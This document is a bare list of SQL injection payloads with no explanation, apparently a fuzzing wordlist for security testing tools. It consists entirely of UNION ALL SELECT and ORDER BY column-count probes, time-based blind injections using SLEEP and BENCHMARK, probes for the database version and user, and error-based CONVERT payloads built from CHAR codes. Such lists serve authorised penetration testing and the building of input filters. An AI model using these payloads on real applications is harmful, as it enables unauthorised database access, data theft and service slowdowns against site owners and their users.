ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
UNION ALL SELECT 1
UNION ALL SELECT 1,2
UNION ALL SELECT 1,2,3
UNION ALL SELECT 1,2,3,4
UNION ALL SELECT 1,2,3,4,5
UNION ALL SELECT 1,2,3,4,5,6
UNION ALL SELECT 1,2,3,4,5,6,7
UNION ALL SELECT 1,2,3,4,5,6,7,8
UNION ALL SELECT 1,2,3,4,5,6,7,8,9
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 1#
UNION ALL SELECT 1,2#
UNION ALL SELECT 1,2,3#
UNION ALL SELECT 1,2,3,4#
UNION ALL SELECT 1,2,3,4,5#
UNION ALL SELECT 1,2,3,4,5,6#
UNION ALL SELECT 1,2,3,4,5,6,7#
UNION ALL SELECT 1,2,3,4,5,6,7,8#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT 1-- 
UNION ALL SELECT 1,2-- 
UNION ALL SELECT 1,2,3-- 
UNION ALL SELECT 1,2,3,4-- 
UNION ALL SELECT 1,2,3,4,5-- 
UNION ALL SELECT 1,2,3,4,5,6-- 
UNION ALL SELECT 1,2,3,4,5,6,7-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
UNION SELECT @@VERSION,SLEEP(5),3
UNION SELECT @@VERSION,SLEEP(5),USER(),4
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION SELECT @@VERSION,SLEEP(5),"'3
UNION SELECT @@VERSION,SLEEP(5),"'3'"#
UNION SELECT @@VERSION,SLEEP(5),USER(),4#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT USER()-- 
UNION ALL SELECT SLEEP(5)-- 
UNION ALL SELECT USER(),SLEEP(5)-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT NULL-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- 
UNION ALL SELECT NULL#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
